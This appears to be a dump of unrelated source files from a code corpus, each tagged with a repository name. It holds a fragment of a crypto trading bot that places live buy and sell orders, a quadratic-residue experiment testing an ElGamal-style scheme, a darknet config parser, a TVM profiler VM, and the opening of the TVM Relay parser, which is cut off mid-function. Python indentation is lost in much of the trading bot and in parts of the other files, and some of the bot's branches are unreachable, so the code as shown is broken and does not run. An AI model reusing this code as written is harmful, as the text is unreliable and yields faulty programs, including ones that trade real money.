#SE3P.append(r) #5min
print("appended SE3P[1]")
print(SE3P)
elif len(SE3P) == 3:
#SE3P.append(r) #10min
print("appended SE3P[2]")
print(SE3P)
elif len(SE3P) == 4:
#SE3P.append(r) #15min
print("appended SE3P[3]")
print(SE3P)
elif len(SE3P) == 5:
#SE3P.append(r) #20min
print("appended SE3P[4]")
print(SE3P)
elif len(SE3P) == 6:
#SE3P.append(r) #25min
print("appended SE3P[5]")
print(SE3P)
# BUY
# if it's been less than 30 minutes since the start of the program
if counter1 < 6:
        # For each 5-minute step, compare the price at program start to the
        # current price, widening the required difference as time passes.
        # If the starting price times the step's percentage exceeds the
        # current price AND the current price is below average cost minus a
        # set percentage, buy Shares2Buy dollars' worth, then update
        # average_cost and num_shares.
        # NOTE: this `== 6` branch is unreachable inside the enclosing
        # `counter1 < 6` check.
        if counter1 == 6:
if float(SE3P[0])*1.005 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 5:
if float(SE3P[0])*1.0045 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 4:
if float(SE3P[0])*1.004 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 3:
if float(SE3P[0])*1.0035 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif counter1 == 2:
if float(SE3P[0])*1.003 > float(r) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
#BUY
# if first price is < than 2nd
# if it has been 30 minutes or more since the start of the program
if counter1 >= 6:
        # Compare the current price against each stored price SE3P[0]..SE3P[5]
        # in order, with a percentage threshold that grows with the index.
        # If the current price times the step's percentage is below one of
        # the entries AND the current price is below average cost minus a set
        # percentage, buy Shares2Buy dollars' worth, then update average_cost
        # and num_shares.
if float(r)*1.004 < float(SE3P[0]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.005 < float(SE3P[1]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.006 < float(SE3P[2]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.007 < float(SE3P[3]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.008 < float(SE3P[4]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
elif float(r)*1.01 < float(SE3P[5]) and float(r) < float(average_cost-float(average_cost*float(0.015))):
# instruction step (3) fill in amount in dollars in place of float(20)
Shares2Buy = math.floor(float(20) / float(r)-1)
crypto_BUY(ticker, Shares2Buy)
print("bought:", r)
tempval = average_cost*num_shares
average_cost = tempval
average_cost += float(r)
num_shares += 1
average_cost /= float(num_shares)
print("avg cost:" + str(average_cost))
#SELL
# if it's been less than 30 minutes since the start of the program
if counter2 < 6:
        # For each 5-minute step, compare the price at program start to the
        # current price, widening the required difference as time passes.
        # If the starting price times the step's percentage is below the
        # current price AND the current price exceeds average cost plus a set
        # percentage, sell Shares2Sell dollars' worth, then update num_shares.
        # NOTE: this `== 6` branch is unreachable inside the enclosing
        # `counter2 < 6` check.
        if counter2 == 6:
if float(SE3P[0])*1.0115 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 5:
if float(SE3P[0])*1.0105 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 4:
if float(SE3P[0])*1.0095 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 3:
if float(SE3P[0])*1.0085 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif counter2 == 2:
if float(SE3P[0])*1.0075 < float(r) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
#SELL
# if it has been 30 minutes or more since the start of the program
if counter2 >= 6:
        # Compare the current price against each stored price SE3P[0]..SE3P[5]
        # in order, with a percentage threshold that grows with the index.
        # If the current price times the step's percentage exceeds one of the
        # entries AND the current price exceeds average cost plus a set
        # percentage, sell Shares2Sell dollars' worth, then update num_shares.
if float(r)*0.996 > float(SE3P[0]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.995 > float(SE3P[1]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.993 > float(SE3P[2]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.991 > float(SE3P[3]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.989 > float(SE3P[4]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
elif float(r)*0.987 > float(SE3P[5]) and float(r) > float(average_cost+float(average_cost*float(0.04))):
# instruction step (4) fill in amount in dollars in place of float(100)
Shares2Sell = math.floor(float(40) / float(r)+1)
crypto_SELL(ticker, Shares2Sell)
print("sold:", r)
print("avg cost:", average_cost)
num_shares -= 2.0
# Keeps track of counter
print("c1:" + str(counter1))
print("c2:" + str(counter2))
counter1 += 1
counter2 += 1
if num_shares <= 0:
sys.exit()
# calls scheduler every 5 minutes
s.enter(300, 1, run, (sc,))
# Functions to buy and sell crypto currency
def crypto_BUY(ticker, amountD):
r = robin_stocks.orders.order_buy_crypto_by_quantity(ticker, amountD)
print(r)
def crypto_SELL(ticker, amountD):
r = robin_stocks.orders.order_sell_crypto_by_quantity(ticker, amountD)
print(r)
s.enter(1, 1, run, (s,))
s.run()
``` |
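The five near-identical branches in each buy/sell ladder differ only in their threshold multiplier, so the whole ladder could be collapsed into a lookup table keyed by elapsed 5-minute steps. A hypothetical refactor sketch, not part of the original bot (`BUY_STEPS` and `should_buy` are illustrative names):
```python
# thresholds taken from the ladder above (steps 2-5; step 1 takes no action,
# and the original `counter == 6` branch is unreachable)
BUY_STEPS = {2: 1.003, 3: 1.0035, 4: 1.004, 5: 1.0045}

def should_buy(step, first_price, price, avg_cost):
    """Same rule as the ladder: the starting price, scaled by the step's
    multiplier, still exceeds the current price while the current price
    sits below average cost minus 1.5%."""
    bound = BUY_STEPS.get(step)
    if bound is None:
        return False
    return first_price * bound > price and price < avg_cost * (1 - 0.015)
```
The sell ladder admits the same treatment with its own threshold table, and since `counter1` and `counter2` are always incremented together, a single step counter would suffice.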
{
"source": "0x00Jeff/ShitCrypt",
"score": 3
} |
#### File: 0x00Jeff/ShitCrypt/ShitCrypt.py
```python
from subprocess import call
import random
import math
def isQR(x, p):
    # Euler's criterion: x^((p-1)/2) mod p is 1 for quadratic residues;
    # integer division is required so pow() gets an int exponent
    q = (p - 1) // 2
    return pow(x, q, p)
def findQNR(p):
r = random.randint(1, p - 1)
while isQR(r, p) == 1:
r = random.randint(1, p - 1)
return r
def findQR(p):
r = random.randint(1, p - 1)
return pow(r, 2, p)
print ("Generating the key...")
call(["gcc", "-o", "keygen", "keygen.c", "-lgcrypt"])
call(["gcc", "-o", "encrypt", "encrypt.c", "-lgcrypt"])
call("./keygen")
p = int(open("./p").read(), 16)
y = int(open("./y").read(), 16)
wrong = 0
runs = 1000
print ("Running the experiment...")
for i in range(runs):
pk = y
plaintexts = dict()
plaintexts[0] = findQNR(p)
plaintexts[1] = findQR(p)
challenge_bit = random.randint(0,1)
    challenge_string = hex(plaintexts[challenge_bit])
    # strip the '0x' prefix (the old [2:-1] slice assumed Python 2's
    # trailing 'L' and would drop a hex digit under Python 3)
    challenge_string = challenge_string[2:]
    challenge_string = challenge_string.zfill(256)
    challenge_string = challenge_string.upper()
    open("./pt", "w").write(challenge_string)
call("./encrypt")
ct_a = int(open("./ct_a").read(), 16)
ct_b = int(open("./ct_b").read(), 16)
output = -1
if ((isQR(pk, p) == 1) or (isQR(ct_a, p) == 1)):
if isQR(ct_b, p) == 1:
output = 1
else:
output = 0
else:
if isQR(ct_b, p) == 1:
output = 0
else:
output = 1
if output != challenge_bit:
wrong = wrong + 1
print ("Number of times the guess was wrong (should be 50% if this shit is secure):"), wrong, "/", runs
``` |
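The experiment above is the classic IND-CPA break of textbook ElGamal over the full group Z_p*: by Euler's criterion, quadratic-residue-ness is efficiently computable and multiplicative, so for a ciphertext (a, b) = (g^k, m·y^k) the residue status of b leaks QR(m), which is exactly the challenge bit. A short sketch of the criterion itself (the prime and test values are illustrative):
```python
def legendre(x, p):
    """Euler's criterion: returns 1 for quadratic residues mod an odd
    prime p, and p - 1 for non-residues."""
    return pow(x, (p - 1) // 2, p)

p = 23
assert legendre(4, p) == 1         # 4 = 2^2 is a residue
assert legendre(5, p) == p - 1     # 5 is a non-residue mod 23
```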
{
"source": "0x00-pl/kendryte-model-compiler",
"score": 2
} |
#### File: darknet/D2T_lib/net.py
```python
import copy
import re
from . import bwidth
from . import layers
__parse_layers__ = {
'depthwise_convolutional': layers.dw_convolutional_layer,
'convolutional': layers.convolutional_layer,
'connected': None,
'maxpool': layers.maxpooling_layer,
'avgpool': layers.avgpooling_layer,
'route': layers.route_layer,
'softmax': None
}
__unit_size__ = {
'bit': 8,
'byte': 1,
'KB': 1.0 / 1024,
'MB': 1.0 / 1024 / 1024,
'GB': 1.0 / 1024 / 1024 / 1024
}
__empty_info__ = re.compile(' ')
"""
virtual class for only storing the structure of the network without param.
interference features:
- import .cfg -> virtual net
- export self -> .cfg
- export self -> tensorflow code (module like)
- statistics of parameters
"""
class net(object):
def __init__(self, name, scope=None, dtype='float32'):
self.name = name
self.scope = scope
self.dtype = dtype
self.layers = dict()
# input size
self.input_size = {
'batch': 1,
'size': [0],
}
# net route : to be used in the future, now as sequence
self.route = []
# statistics table
self.statistics = {}
def layers_from_cfg(self, cfg_path):
with open(cfg_path) as F:
# skip empty lines
contents = list(l.strip() for l in filter(lambda x: True if len(x) > 1 else False,
F.readlines()))
# get blocks for parsing
block_st = -1
line_id = 0
block_id = -1
for l in contents:
if l[0] == '[': # find block header
if block_st > -1:
# return kwargs for construct layer
self.parse_block(contents[block_st:line_id], copy.copy(block_id))
block_id += 1
block_st = line_id
line_id += 1
        # flush the trailing block -- the loop above only parses a block when
        # it sees the *next* header
        if block_st > -1:
            self.parse_block(contents[block_st:line_id], copy.copy(block_id))
        self.match_between_layers()  # sequence layers
# match in/out
def match_between_layers(self):
prev_in_channel = self.input_size['size'][-1]
for k in self.route:
_layer = self.layers[k]
_layer.num_in = prev_in_channel
if _layer.num_out == 0:
_layer.num_out = prev_in_channel
elif _layer.num_out == -1: # route layer
_layer.num_out = 0
for prevl in range(len(_layer.route_layers)):
_jump = _layer.route_layers[prevl]
refer_l = self.route[k + _jump if _jump < 0 else _jump]
_layer.num_out += self.layers[refer_l].num_out
_layer.route_layers[prevl] = self.layers[refer_l].name
prev_in_channel = _layer.num_out
print(k, _layer.type, ' | ', _layer.num_in, '->', _layer.num_out)
# split block lines into dictionary
def __split_block_opt__(self, block_lines):
global __empty_info__
kv_split = list(__empty_info__.sub('', l).split('=') for l in block_lines)
kv_split = filter(lambda x: len(x) == 2, kv_split) # filtering invalid line
return {k[0]: k[1] for k in kv_split}
def parse_block(self, lines, index):
header = lines[0]
# get layer type
if header == '[net]':
net_opt = self.__split_block_opt__(lines[1:])
self.input_size['batch'] = (int)(net_opt['batch'])
self.input_size['size'] = [
(int)(net_opt['width']),
(int)(net_opt['height']),
(int)(net_opt['channels'])
]
elif header == '[region]':
pass
elif header[0] == '[':
default_name = header[1:-1]
default_scope = None
initializer = __parse_layers__[default_name]
if initializer:
# use the same keys as cfg file
layer_opt = self.__split_block_opt__(lines[1:])
layer_opt['#TYPE'] = default_name
if '#NAME' not in layer_opt:
layer_opt['#NAME'] = str(index)
if '#SCOPE' not in layer_opt:
layer_opt['#SCOPE'] = default_scope
self.layers[index] = initializer(dtype=self.dtype,
kwargs=layer_opt)
self.layers[layer_opt['#NAME']] = self.layers[index]
self.route.append(index)
else:
print('unsupported layer type: %s' % (header))
def statistcs_size(self, unit='MB', print_out=False, export_csv_as=None):
total_count = 0.0
        self.statistics['layer_size'] = []  # may be handled with Pandas in the future
        # columns:
        #   index | layer type |
        #   param count (this layer) | param size (:unit, this layer) |
        #   param count (accumulated) | param size (:unit, accumulated) |
        #   fraction
for k in self.route:
_layer = self.layers[k]
my_size = _layer.my_size(flag='count')
p_count = sum(my_size.values())
total_count += p_count
self.statistics['layer_size'].append([
str(k),
_layer.type,
p_count,
p_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype],
total_count,
total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype],
None
])
# compute fractions
for l in self.statistics['layer_size']:
l[-1] = (float)(l[2]) / (float)(total_count)
# summary
self.statistics['summary'] = ([
total_count,
total_count * __unit_size__[unit] * bwidth.__bwidth__[self.dtype]
])
"""
table = DF(columns=['index', 'layer type',
'param count','param size(%s)'%(unit),
'acc. count', 'acc. size(%s)'%(unit),
'fraction(%)'],
data=self.statistics['layer_size'])
# formatting
if print_out or export_csv_as:
print_table = deepcopy(table)
print_table['index'] = print_table['index'].map(lambda x:'<%s>'%x)
print_table['param count'] = print_table['param count'].map(lambda x: '%i'%x)
print_table['acc. count'] = print_table['acc. count'].map(lambda x: '%i' % x)
print_table['fraction(%)'] = print_table['fraction(%)'].map(lambda x: '%.2f%%'%(x*100.0))
self.print_table = print_table
if print_out:
print('Data type: ', self.dtype)
print(print_table)
print('summary:\ntotal count: %i\ntotal size: %.4f %s'%(
self.statistics['summary'][0],
self.statistics['summary'][1],
unit
))
if export_csv_as is not None:
print_table.to_csv(export_csv_as,index=False)
"""
``` |
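A quick illustration of the block parsing above: `__split_block_opt__` strips spaces and turns `key=value` lines into a dict, silently filtering lines that do not split into exactly two parts; values stay strings until the caller casts them. The sample lines are illustrative:
```python
lines = ["batch = 1", "width= 224", "momentum=0.9", "a line with no equals"]
opts = net("demo").__split_block_opt__(lines)
assert opts == {"batch": "1", "width": "224", "momentum": "0.9"}
```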
{
"source": "0x00-pl/tvm",
"score": 2
} |
#### File: relay/backend/profiler_vm.py
```python
import tvm
from . import vm, _vm
def _update_target(target):
target = target if target else tvm.target.current_target()
if target is None:
raise ValueError("Target is not set in env or passed as argument.")
tgts = {}
if isinstance(target, (str, tvm.target.Target)):
dev_type = tvm.expr.IntImm("int32", tvm.nd.context(str(target)).device_type)
tgts[dev_type] = tvm.target.create(target)
elif isinstance(target, dict):
for dev, tgt in target.items():
dev_type = tvm.expr.IntImm("int32", tvm.nd.context(dev).device_type)
tgts[dev_type] = tvm.target.create(tgt)
else:
raise TypeError("target is expected to be str, tvm.target.Target, " +
"or dict of str to str/tvm.target.Target, but received " +
"{}".format(type(target)))
return tgts
class VMCompilerProfiler(vm.VMCompiler):
"""Build Relay module to run on VM runtime."""
def __init__(self):
super().__init__()
self.mod = _vm._VMCompilerProfiler()
self._compile = self.mod["compile"]
self._get_vm = self.mod["get_vm"]
def compile(self, mod, target=None, target_host=None):
"""
Parameters
----------
mod : relay.Module
The Relay module to build.
target : str, :any:`tvm.target.Target`, or dict of str(i.e.
device/context name) to str/tvm.target.Target, optional
For heterogeneous compilation, it is a dictionary indicating context
to target mapping. For homogeneous compilation, it is a build target.
target_host : str or :any:`tvm.target.Target`, optional
Host compilation target, if target is device.
When TVM compiles device specific program such as CUDA,
we also need host(CPU) side code to interact with the driver
to setup the dimensions and parameters correctly.
target_host is used to specify the host side codegen target.
By default, llvm is used if it is enabled,
            otherwise a stackvm interpreter is used.
Returns
-------
vm : VirtualMachineProfiler
The profile VM runtime.
"""
target = _update_target(target)
self._compile(mod, target, target_host)
return VirtualMachineProfiler(self._get_vm())
class VirtualMachineProfiler(vm.VirtualMachine):
"""Relay profile VM runtime."""
def __init__(self, mod):
super().__init__(mod)
self._get_stat = self.mod["get_stat"]
def get_stat(self):
return self._get_stat()
```
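A hypothetical end-to-end sketch of the API above. The Relay program is illustrative, and the `init`/`invoke` calls assume the base `vm.VirtualMachine` interface of TVM from this era, which is not defined in this file:
```python
import numpy as np
import tvm
from tvm import relay

x = relay.var("x", shape=(1, 10))
mod = relay.Module.from_expr(relay.Function([x], relay.nn.softmax(x)))

profiler_vm = VMCompilerProfiler().compile(mod, target="llvm")
profiler_vm.init(tvm.cpu())
profiler_vm.invoke("main", tvm.nd.array(np.random.rand(1, 10).astype("float32")))
print(profiler_vm.get_stat())   # per-op timing collected by the profile VM
```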
#### File: tvm/relay/_parser.py
```python
from __future__ import absolute_import
import sys
from ast import literal_eval
from typing import Any, Deque, Dict, List, Optional, TypeVar, Tuple, Union
from collections import deque
import tvm
from . import module
from .base import Span, SourceName
from . import adt
from . import expr
from . import ty
from . import op
PYTHON_VERSION = sys.version_info.major
try:
from .grammar.py3.RelayVisitor import RelayVisitor
from .grammar.py3.RelayParser import RelayParser
from .grammar.py3.RelayLexer import RelayLexer
except ImportError:
raise Exception("Couldn't find ANTLR parser. Try building with USE_ANTLR=ON.")
try:
from antlr4 import InputStream, CommonTokenStream
from antlr4.error.ErrorListener import ErrorListener
except ImportError:
raise Exception("Couldn't find ANTLR runtime." +
"Try running `pip{version} install antlr4-python{version}-runtime`."
.format(version=PYTHON_VERSION))
sys.setrecursionlimit(10000)
class ParseError(Exception):
"""Exception type for parse errors."""
def __init__(self, message: str) -> None:
super(ParseError, self).__init__()
self.message = message
def __repr__(self):
return "ParseError({})".format(self.message)
def __str__(self):
return repr(self)
class OpWrapper:
"""Overload the __call__ for op."""
pass
class ExprOp(OpWrapper):
"""Call an expr. The default, but does not handle attrs well."""
def __init__(self, operator):
self.operator = operator
def __call__(self, args, attrs, type_args):
try:
return expr.Call(self.operator, args, attrs, type_args)
except Exception:
raise Exception("Operator {} is not registered. It's attributes are {}"
.format(self.operator, attrs))
class FuncOp(OpWrapper):
"""Convert the attrs, call the python function with the attrs passed in as keyword arguments.
Tvm should provide this in the future, as this is pretty similar to what op.get is providing.
"""
def __init__(self, operator):
self.operator = operator
def convert(self, v):
if isinstance(v, tuple):
return tuple([self.convert(x) for x in v])
if isinstance(v, expr.Constant):
return v.data.asnumpy().item()
if isinstance(v, str):
return v
raise Exception(v)
def __call__(self, args, attrs, type_args):
if attrs is None:
attrs = {}
x = self.operator(*args, **{k: self.convert(v) for k, v in attrs.items()})
if isinstance(x, expr.TupleWrapper):
x = x.astuple()
return x
BINARY_OPS = {
RelayParser.MUL: op.multiply,
RelayParser.DIV: op.divide,
RelayParser.ADD: op.add,
RelayParser.SUB: op.subtract,
RelayParser.LT: op.less,
RelayParser.GT: op.greater,
RelayParser.LE: op.less_equal,
RelayParser.GE: op.greater_equal,
RelayParser.EQ: op.equal,
RelayParser.NE: op.not_equal,
}
FUNC_OPS = {
"nn.conv2d": op.nn.conv2d,
"nn.batch_norm": op.nn.batch_norm,
"nn.dense": op.nn.dense,
"nn.bias_add": op.nn.bias_add,
"nn.max_pool2d": op.nn.max_pool2d,
"nn.global_max_pool2d": op.nn.global_max_pool2d,
"nn.avg_pool2d": op.nn.avg_pool2d,
"nn.global_avg_pool2d": op.nn.global_avg_pool2d,
"nn.softmax": op.nn.softmax,
"reshape": op.reshape,
"nn.conv2d_transpose": op.nn.conv2d_transpose,
"concatenate": op.concatenate,
"nn.dropout": op.nn.dropout_raw,
"zeros": op.zeros,
"split": op.split,
"cast": op.cast
}
TYPE_PREFIXES = [
"int",
"uint",
"float",
"bool",
]
T = TypeVar("T")
Scope = Deque[Tuple[str, T]]
Scopes = Deque[Scope[T]]
def lookup(scopes: Scopes[T], name: str) -> Optional[T]:
"""Look up `name` in `scopes`."""
for scope in scopes:
for key, val in scope:
if key == name:
return val
return None
def spanify(f):
"""A decorator which attaches span information
to the value returned by calling `f`.
Intended for use with the below AST visiting
methods. The idea is that after we do the work
of constructing the AST we attach Span information.
"""
def _wrapper(*args, **kwargs):
# Assumes 0th arg is self and gets source_name from object.
sn = args[0].source_name
# Assumes 1st arg is an ANTLR parser context.
ctx = args[1]
ast = f(*args, **kwargs)
line, col = ctx.getSourceInterval()
sp = Span(sn, line, col)
if isinstance(ast, tvm.relay.expr.TupleWrapper):
ast = ast.astuple()
ast.set_span(sp)
return ast
return _wrapper
# TODO(@jmp): Use https://stackoverflow.com/q/13889941
# to figure out how to get ANTLR4 to be more unhappy about syntax errors
class ParseTreeToRelayIR(RelayVisitor):
"""Parse Relay text format into Relay IR."""
def __init__(self, source_name: str) -> None:
self.source_name = source_name
self.module = module.Module({}) # type: module.Module
# Adding an empty scope allows naked lets without pain.
self.var_scopes = deque([deque()]) # type: Scopes[expr.Var]
self.global_vars = {} # type: Scope[expr.GlobalVar]
self.type_var_scopes = deque([deque()]) # type: Scopes[ty.TypeVar]
self.global_type_vars = {} # type: Scope[expr.GlobalVar]
self.graph_expr = [] # type: List[expr.Expr]
super(ParseTreeToRelayIR, self).__init__()
def enter_var_scope(self) -> None:
"""Enter a new Var scope so it can be popped off later."""
self.var_scopes.appendleft(deque())
def exit_var_scope(self) -> Scope[expr.Var]:
"""Pop off the current Var scope and return it."""
return self.var_scopes.popleft()
def mk_var(self, name: str, typ: ty.Type = None):
"""Create a new Var and add it to the Var scope."""
var = expr.Var(name, typ)
self.var_scopes[0].appendleft((name, var))
return var
def mk_global_var(self, name: str) -> expr.GlobalVar:
"""Create a new GlobalVar and add it to the GlobalVar scope."""
if name in self.global_vars:
raise ParseError(f"duplicate global var \"{name}\"")
var = expr.GlobalVar(name)
self.global_vars[name] = var
return var
def enter_type_param_scope(self) -> None:
"""Enter a new TypeVar scope so it can be popped off later."""
self.type_var_scopes.appendleft(deque())
def exit_type_param_scope(self) -> Scope[ty.TypeVar]:
"""Pop off the current TypeVar scope and return it."""
return self.type_var_scopes.popleft()
def mk_typ(self, name: str, kind: ty.Kind) -> ty.TypeVar:
"""Create a new TypeVar and add it to the TypeVar scope."""
typ = ty.TypeVar(name, kind)
self.type_var_scopes[0].appendleft((name, typ))
return typ
def mk_global_typ_var(self, name, kind):
# (str, ty.Kind) -> ty.GlobalTypeVar
"""Create a new TypeVar and add it to the TypeVar scope."""
typ = ty.GlobalTypeVar(name, kind)
self._check_existing_typ_expr(name, typ)
self.global_type_vars[name] = typ
return typ
# TODO: rethink whether we should have type constructors mixed with type vars.
def mk_global_typ_cons(self, name, cons):
self._check_existing_typ_expr(name, cons)
self.global_type_vars[name] = cons
def _check_existing_typ_expr(self, name, new_expr):
if name in self.global_type_vars:
new_typ_name = self._type_expr_name(new_expr)
existing_typ_name = self._type_expr_name(self.global_type_vars[name])
raise ParseError(
f"{new_typ_name} `{name}` conflicts with existing {existing_typ_name}")
def _type_expr_name(self, e):
if isinstance(e, adt.Constructor):
return f"`{e.belong_to.var.name}` ADT constructor"
elif isinstance(e, ty.GlobalTypeVar):
if e.kind == ty.Kind.AdtHandle:
return f"ADT definition"
return "function definition"
def visitProjection(self, ctx):
return expr.TupleGetItem(self.visit(ctx.expr()), self.visit(ctx.NAT()))
def visitTerminal(self, node) -> Union[expr.Expr, int, float]:
"""Visit lexer tokens that aren't ignored or visited by other functions."""
node_type = node.getSymbol().type
node_text = node.getText()
if node_type == RelayLexer.NAT:
return int(node_text)
if node_type == RelayLexer.FLOAT:
return float(node_text[:-1])
if node_type == RelayLexer.BOOL_LIT:
if node_text == "True":
return True
if node_text == "False":
return False
raise ParseError("unrecognized BOOL_LIT: `{}`".format(node_text))
if node_type == RelayLexer.QUOTED_STRING:
return literal_eval(node_text)
raise ParseError(f"unhandled terminal \"{node_text}\" of type `{node_type}`")
def visitGeneralIdent(self, ctx):
name = ctx.getText()
# Look through all type prefixes for a match.
for type_prefix in TYPE_PREFIXES:
if name.startswith(type_prefix):
return ty.scalar_type(name)
# Next, look it up in the local then global type params.
type_param = lookup(self.type_var_scopes, name)
if type_param is None:
type_param = self.global_type_vars.get(name, None)
if type_param is not None:
return type_param
# Check if it's an operator.
op_name = ".".join([name.getText() for name in ctx.CNAME()])
if op_name in FUNC_OPS:
return FuncOp(FUNC_OPS[op_name])
return ExprOp(op.get(op_name))
def visitGlobalVar(self, ctx):
var_name = ctx.CNAME().getText()
global_var = self.global_vars.get(var_name, None)
if global_var is None:
raise ParseError(f"unbound global var `{var_name}`")
return global_var
def visitLocalVar(self, ctx):
var_name = ctx.CNAME().getText()
local_var = lookup(self.var_scopes, var_name)
if local_var is None:
raise ParseError(f"unbound local var `{var_name}`")
return local_var
def visitGraphVar(self, ctx):
return self.graph_expr[int(ctx.NAT().getText())]
def visit_list(self, ctx_list) -> List[Any]:
""""Visit a list of contexts."""
# type: RelayParser.ContextParserRuleContext
assert isinstance(ctx_list, list)
return [self.visit(ctx) for ctx in ctx_list]
def getTypeExpr(self, ctx) -> Optional[ty.Type]:
"""Return a (possibly None) Relay type."""
        # type: (Optional[RelayParser.Type_Context]) -> Optional[ty.Type]
if ctx is None:
return None
return self.visit(ctx)
def visitProg(self, ctx: RelayParser.ProgContext) -> Union[expr.Expr, module.Module]:
self.meta = None
if ctx.METADATA():
